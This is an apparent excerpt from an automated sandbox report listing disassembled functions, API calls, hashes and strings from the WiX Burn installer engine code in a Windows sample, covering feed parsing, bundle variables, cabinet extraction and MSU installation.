                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                          • Opcode ID: 1068c4a5e8aac8031e846d6643bd5c2f296e043d18ab94b0131aec5ed4f2c2ba
                                                                                                                                                          • Instruction ID: 79bc70ab094d8993b9a97d0b2f177e81505f375f8c8a262a24e0f2664524a6e6
                                                                                                                                                          • Opcode Fuzzy Hash: 1068c4a5e8aac8031e846d6643bd5c2f296e043d18ab94b0131aec5ed4f2c2ba
                                                                                                                                                          • Instruction Fuzzy Hash: 7FB18F31210608CFDB15CF28C48AB657BE0FF85364F258699E899CF3A1D739E992CB45
                                                                                                                                                          APIs
                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0045205B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2325560087-0
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID:
• String ID: feclient.dll
• API String ID: 0-3074931424
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,004A39F8,000000FF,?,?,?), ref: 00473CE8
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 00473D2A
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 00473D6F
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 00473DB4
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 00473DF9
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00473E3E
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 00473E7B
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 00473EB8
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,link,000000FF), ref: 00473F12
• SysFreeString.OLEAUT32(00000000), ref: 00473F5C
• SysFreeString.OLEAUT32(00000000), ref: 0047410E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: String$Compare$Free
• String ID: Cannot have two content elements in ATOM entry.$Failed to allocate ATOM entry authors.$Failed to allocate ATOM entry categories.$Failed to allocate ATOM entry content.$Failed to allocate ATOM entry id.$Failed to allocate ATOM entry links.$Failed to allocate ATOM entry published.$Failed to allocate ATOM entry summary.$Failed to allocate ATOM entry title.$Failed to allocate ATOM entry updated.$Failed to find required feed/entry/id element.$Failed to find required feed/entry/title element.$Failed to find required feed/entry/updated element.$Failed to get child nodes of ATOM entry element.$Failed to parse ATOM entry author.$Failed to parse ATOM entry category.$Failed to parse ATOM entry content.$Failed to parse ATOM entry link.$Failed to parse unknown ATOM entry element: %ls$Failed to process all ATOM entry elements.$author$cabinet.dll$category$clbcatq.dll$content$crypt32.dll$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
• API String ID: 318886736-1489739114
APIs
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,?,00000000,00000000), ref: 0047558E
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 004755AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CompareString
• String ID: Failed to allocate application identity.$Failed to allocate application summary.$Failed to allocate application title.$Failed to allocate application type.$Failed to allocate content type.$Failed to allocate content.$Failed to allocate enclosures for application update entry.$Failed to allocate upgrade id.$Failed to compare version to upgrade version.$Failed to parse enclosure.$Failed to parse upgrade version string '%ls' from ATOM entry.$Failed to parse version string '%ls' from ATOM entry.$Upgrade version is greater than or equal to application version.$application$clbcatq.dll$comres.dll$crypt32.dll$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$msasn1.dll$msi.dll$true$type$upgrade$version$version.dll$wininet.dll
• API String ID: 1825529933-2598801156
APIs
• EnterCriticalSection.KERNEL32(00000000,00000000,0040955C,0040959C,?,00422D30,0040951C,?,0040951C,?,0040951C,?,?,?,0040955C), ref: 0040D1C2
• LeaveCriticalSection.KERNEL32(00000000,?,00422D30,0040951C,?,0040951C,?,0040951C,?,?,?,0040955C), ref: 0040D737
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Attempt to add built-in variable: %ls$Attempt to add variable again: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant value.$Hidden$Initializing formatted variable '%ls' to value '%ls'$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$d:\a\wix\wix\src\burn\engine\variable.cpp$formatted$numeric$string$version
• API String ID: 3168844106-236387454
• Opcode ID: 15628b976cd43af0f06e45f92c9bc0e7ad15dfa85267ad2ef46b93266d67e4d7
• Instruction ID: 4abdce43269bce2ba97f53a6e37c419888a6064a9d797e4105a60e017dfa868a
• Opcode Fuzzy Hash: 15628b976cd43af0f06e45f92c9bc0e7ad15dfa85267ad2ef46b93266d67e4d7
• Instruction Fuzzy Hash: 77F1F631E40218BBDB119A948C06FEF7735EB48B14F20417BFA087B2D1D7B95A449B9D
APIs
• CompareStringW.KERNEL32(0000007F,00000000,?,00000000,rel,00000000,?,?,?,00000000), ref: 004747E3
• SysFreeString.OLEAUT32(00000000), ref: 00474ABC
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: String$CompareFree
• String ID: Failed get attributes for ATOM link.$Failed to allocate ATOM link href.$Failed to allocate ATOM link rel.$Failed to allocate ATOM link title.$Failed to allocate ATOM link type.$Failed to allocate ATOM link value.$Failed to get child nodes of ATOM link element.$Failed to parse ATOM link length.$Failed to parse unknown ATOM link attribute: %ls$Failed to parse unknown ATOM link element: %ls$Failed to process all ATOM link attributes.$Failed to process all ATOM link elements.$comres.dll$crypt32.dll$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
• API String ID: 3589242889-2471402524
• Opcode ID: 8d488de5f081971132de69643f0bb8fde9a3cc0abe0e654a94ae0999a3a4be33
• Instruction ID: 8859050fcb0f9d6521be0c27c092f4e14b68b88fb17d5a5c6815f29ff4230d6b
• Opcode Fuzzy Hash: 8d488de5f081971132de69643f0bb8fde9a3cc0abe0e654a94ae0999a3a4be33
• Instruction Fuzzy Hash: 85B1C471A80204BBDB119B94CC49FAF7B79EBC5B10F21405AF609B72E0EB749A00DB5D
APIs
• SetEvent.KERNEL32(?,?,?,?,?,00439105,?,?), ref: 00439625
• GetLastError.KERNEL32(?,?,?,?,00439105,?,?), ref: 0043962F
• ResetEvent.KERNEL32(?,?,000000FF,?,?,?,?,00439105,?,?), ref: 004396AC
• GetLastError.KERNEL32(?,?,?,?,00439105,?,?), ref: 004396B6
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ErrorEventLast$Reset
• String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %hs$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
• API String ID: 1970322416-2309543796
• Opcode ID: 0b00d0f38331d1bdb338f71f623b3615c57987e31691571c811a7c7f8f3525c2
• Instruction ID: 51f1b6446c630834b62b8ec5a3802152404dc79ef1bafac3c7420446c547d317
• Opcode Fuzzy Hash: 0b00d0f38331d1bdb338f71f623b3615c57987e31691571c811a7c7f8f3525c2
• Instruction Fuzzy Hash: 07A1C336A9532173E7316A654C0EF672D185B45B60F22127ABE08BE2D2E6EC8C4096DC
APIs
• InitializeCriticalSection.KERNEL32(00422C91,0040951C,x86,0040959C), ref: 0040C1FF
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CriticalInitializeSection
• String ID: $yG$Date$Failed to add built-in variable: %ls.$Failed to add well-known variable: %ls.$InstallerName$InstallerVersion$LogonUser$RebootPending$SeShutdownPrivilege$WixBundleAction$WixBundleActiveParent$WixBundleCommandLineAction$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInProgressName$WixBundleInstalled$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleManufacturer$WixBundleName$WixBundleOriginalSource$WixBundleOriginalSourceFolder$WixBundleProviderKey$WixBundleTag$WixBundleUILevel$WixBundleVersion$d:\a\wix\wix\src\burn\engine\variable.cpp$x86
• API String ID: 32694325-1426782853
• Opcode ID: a038d6ac9a36dc735fa910deba064c9bbe6c08f63672600275dac8cd61b7b279
• Instruction ID: af53c76a940e29da13ad0b15c5532c219145e811318497a92c4d5bf437ae5bf0
• Opcode Fuzzy Hash: a038d6ac9a36dc735fa910deba064c9bbe6c08f63672600275dac8cd61b7b279
• Instruction Fuzzy Hash: 52425DB0C117689FDB65CF59C9487CDFAB9BB48704F1085EAD20CB6250D7B80A99CF89
APIs
• InitializeCriticalSection.KERNEL32(clbcatq.dll,00000080,00000000,msasn1.dll,000000B0,00000000,000000B0,00000214,00000000,00000000,00000000,clbcatq.dll,?,00000001,?,WixBundleOriginalSource), ref: 00421E9B
  • Part of subcall function 00422B06: CreateThread.KERNEL32(00000000,00000000,004218F0,00000000,00000000,00000000), ref: 00422BA5
  • Part of subcall function 00422B06: GetLastError.KERNEL32(?,00421F0E,00000000,00009003,?,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808), ref: 00422BB9
• CreateThread.KERNEL32(00000000,00000000,00420C50,?,00000000,00000000), ref: 00421FC5
• GetLastError.KERNEL32(?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808,?,?,?,?,?), ref: 00421FD2
• CloseHandle.KERNEL32(?,?,000000FF,?,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808,?), ref: 00422091
• ReleaseMutex.KERNEL32(00000000,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808,?), ref: 004221DC
• CloseHandle.KERNEL32(00000000,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808,?), ref: 004221E5
• CloseHandle.KERNEL32(?,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808,?), ref: 004221F3
• DeleteCriticalSection.KERNEL32(?,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808,?), ref: 00422205
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CloseHandle$CreateCriticalErrorLastSectionThread$DeleteInitializeMutexRelease
• String ID: Another per-user setup is already executing.$Apply cannot be done without a successful Plan.$BA aborted apply begin.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to initialize apply in elevated process.$Failed to register bundle.$Failed to set initial apply variables.$Failed to wait for cache thread after execute.$Failed to wait for cache thread before execute.$Failed while caching, aborting execution.$Plans cannot be applied multiple times.$clbcatq.dll$comres.dll$d:\a\wix\wix\src\burn\engine\core.cpp$msasn1.dll
• API String ID: 885065316-980604374
• Opcode ID: 082e85f43843f30b395e3410d35773ebd57535d36c2a83488cc5aabf9cd7ad90
• Instruction ID: 16344dd9ca08d56e8d3becdd719c362b68f1a608f37b81c7ee8988d0657c9997
• Opcode Fuzzy Hash: 082e85f43843f30b395e3410d35773ebd57535d36c2a83488cc5aabf9cd7ad90
• Instruction Fuzzy Hash: FFF1AD70A00715FAEB21DBA1DD46FFFB7B8AB04704F90442BF615B6190E7B8A941CB19
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(00000024,80000000,00000024,00000000,00000003,08000080,00000000,00000000,00000000,00000024,00000120,00000001,00000000,00000120,00000024,?), ref: 004052F6
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405304
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405316
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$CreateFile
                                                                                                                                                          • String ID: *wzSrcPath is null$Failed to allocate memory to read in file: %ls$Failed to completely read file: %ls$Failed to get size of file: %ls$Failed to load file: %ls, too large.$Failed to open file: %ls$Failed to re-allocate memory to read in file: %ls$Failed to read from file: %ls$Failed to seek position %d$Invalid argument pcbDest$Invalid argument ppbDest$Invalid argument wzSrcPath$Start position %d bigger than file '%ls' size %llu$Underflow calculating remaining buffer size.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 1722934493-1793223109
                                                                                                                                                          • Opcode ID: 30e3fd0411f3ea4cdf7b4773148fdc262f2aca75163994e343275964f46cd696
                                                                                                                                                          • Instruction ID: 1c2354ddb4e417755ff3b77177f4c68122f853fe0c28117105180553bdcc1f50
                                                                                                                                                          • Opcode Fuzzy Hash: 30e3fd0411f3ea4cdf7b4773148fdc262f2aca75163994e343275964f46cd696
                                                                                                                                                          • Instruction Fuzzy Hash: 22C1EA71E807157BEB209A548C4EFAF3668DB04B54F11453FBD09BB2C1E6BC4D409EA8
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,?,?,?,?,?,00475961,?,?), ref: 004752D4
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,?,000000FF,?,?,?,00475961,?,?), ref: 004752EE
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,?,000000FF,?,?,?,00475961,?,?), ref: 0047530C
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed to allocate enclosure URL.$Failed to allocate memory for digest.$Failed to copy local name.$Failed to decode digest value.$Failed to get string length of digest value.$Invalid digest length (%Iu) for digest algorithm (%u).$Unknown algorithm type for digest.$algorithm$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$name$sha1$sha256$sha512
                                                                                                                                                          • API String ID: 1825529933-3499656293
                                                                                                                                                          • Opcode ID: b78165b77fe698c9768a63c00b24bbcdaeec4d3ebc61b69d5b66370faa4f6b83
                                                                                                                                                          • Instruction ID: 4403052e51fd00c239bc435550204cf33ba61f6b25a43c83351b4ee40c5f7c58
                                                                                                                                                          • Opcode Fuzzy Hash: b78165b77fe698c9768a63c00b24bbcdaeec4d3ebc61b69d5b66370faa4f6b83
                                                                                                                                                          • Instruction Fuzzy Hash: CC711831B84B11B7DB205B458C46F967A65EB25B31F208326F63DBE2E1C7FC99408798
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000018,00000001,?,00000000,00000000,?,?,004512CC,?,?,?), ref: 00450BA0
                                                                                                                                                          • GetLastError.KERNEL32(?,?,004512CC,?,?,?,?,?,?,?,00000000,00000000), ref: 00450BAD
                                                                                                                                                          • ReleaseMutex.KERNEL32(?), ref: 00450E77
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocCreateErrorEventLastMutexProcessRelease
                                                                                                                                                          • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$d:\a\wix\wix\src\burn\engine\netfxchainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                                                                                                          • API String ID: 1118593306-2143231347
                                                                                                                                                          • Opcode ID: 043ba92809be9bd1fb3edf86cf180b4d0557321ab0c4243b9197f1e63dd715ee
                                                                                                                                                          • Instruction ID: a0aed0de197431c0ae21c4fcea48aef0c9ebab5c10e3384a7d4234879708bd82
                                                                                                                                                          • Opcode Fuzzy Hash: 043ba92809be9bd1fb3edf86cf180b4d0557321ab0c4243b9197f1e63dd715ee
                                                                                                                                                          • Instruction Fuzzy Hash: 0B91277AA41320BBD7219B558C4AF9B3E649F16B11F114166FE08BF2D3D2B8D804C7AD
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00444792
                                                                                                                                                            • Part of subcall function 00466F79: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,000001D0,00000001,00000120,?,?,?,00471936,00000000), ref: 00466F91
                                                                                                                                                            • Part of subcall function 00466F79: GetProcAddress.KERNEL32(00000000), ref: 00466F98
                                                                                                                                                            • Part of subcall function 00466F79: GetLastError.KERNEL32(?,?,?,00471936,00000000), ref: 00466FC0
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 00444AAE
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 00444ABD
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to ensure WU service was enabled to install MSU package., xrefs: 004449C9
                                                                                                                                                          • "%ls" "%ls" /quiet /norestart, xrefs: 004448F9
                                                                                                                                                          • WixBundleExecutePackageCacheFolder, xrefs: 004448B4, 00444AD7
                                                                                                                                                          • Failed to allocate WUSA.exe path., xrefs: 00444834
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\msuengine.cpp, xrefs: 004447B6, 0044489B, 00444A12
                                                                                                                                                          • wusa.exe, xrefs: 00444821
                                                                                                                                                          • Failed to find System32 directory., xrefs: 00444809
